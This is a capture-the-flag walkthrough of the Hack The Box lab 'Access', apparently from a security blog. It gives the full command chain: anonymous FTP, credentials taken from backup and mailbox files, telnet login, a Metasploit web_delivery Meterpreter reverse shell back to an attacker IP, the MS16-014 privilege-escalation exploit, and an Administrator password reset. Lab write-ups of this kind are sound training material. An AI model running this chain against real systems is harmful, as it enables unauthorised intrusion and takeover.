Today we are going to solve another CTF challenge
“Access”. It is a retired vulnerable lab presented by Hack the Box for helping
pentester’s to perform online penetration testing according to your experience
level; they have a collection of vulnerable labs as challenges, from beginners
to Expert level.
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:
·
Network scanning (nmap).
·
Logging in FTP using
Anonymous Login.
·
Using strings to read
contents of .mdb file.
·
Unzipping Zip file
using 7z.
·
Using readpst to read
the contents of .pst file.
·
Finding Login
Credentials
·
Logging into Telnet.
·
Finding first flag
user.txt
·
Using webdelivery
module to create powershell code.
·
Getting Meterpreter.
·
Using exploit
suggester of Metasploit.
·
Getting Root Access.
·
Changing Administrator
password using net user.
·
Reading Our Final flag
root.txt
Walkthrough
Let’s start off with
scanning the network to find our target.
nmap -p- -A 10.10.10.98
First thing that got our attention is that
we have anonymous access to the
ftp server.
Let’s login and see what we find.
After successfully logging into FTP server, we have enumerated
directories from where we have downloaded two files Access Control.zip and backup.mdb
. They might come in handy later on.
ftp
10.10.10.98
When we tried to unzip the zip file found out
that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
strings
backup.mdb | grep access
Once we have obtained the password for the Access Control.zip. Time to unzip it.
After unzipping we saw its a .pst
which is a Microsoft Exchange Format
for mailboxes. Using readpst it
converted the file into .mbox format.
7z x
Access\ Control.zip
readpst
‘Access Control.pst’
Let’s read the contents of the Access Control.mbox.
less
‘Access Control.mbox’
After reading the contents, we saw that useful
credentials that surely going to help us to move ahead.
Username-
security
Password- 4Cc3ssC0ntr0ller
Let’s login into telnet using our new
credentials. After enumerating through directories, we have found our first
flag.
telnet
10.10.10.98
dir
cd Desktop
type
user.txt
Let’s create a shell
code generated via the web delivery module of Metasploit.
use
exploit/multi/script/web_delivery
set target
2
set
payload windows/x64/meterpreter/reverse_tcp
set lhost
10.10.14.6
exploit
Now we will execute the
PowerShell code generated via the web delivery module.
We have successfully got the meterpreter.
Moving forward.
getuid
getsystem
sysinfo
After that we have used exploit suggester
which has gave us all the possible exploits for the operating system of the
Victims system.
use
post/multi/recon/local_exploit_suggester
set
sessions 1
exploit
Using the exploit ms16_014_wmirecv_notif of metasploit.
use
exploit/windows/local/ms16_014_wmi_recv_notif
set lhost
10.10.14.6
set
session 1
set lport
1234
exploit
oh yeah!
We have got the root access.
whoami
We looked for our Final Flag but couldn’t find
it. Instead we changed the password for Administrator
because we can used it to login via telnet.
net user
net user
Administrator Ignite@123
Here we successfully logged in via Telnet and found our final flag.
telnet
10.10.10.98
login:
administrator
password:
Ignite@123
cd Desktop
type
root.txt
Author: Ashray Gupta is a
Security Researcher and Technical Writer at Hacking Articles. Contributing his
2 years in the field of security as a Penetration Tester and Forensic Computer
Analyst. Contact Here
0 comments:
Post a Comment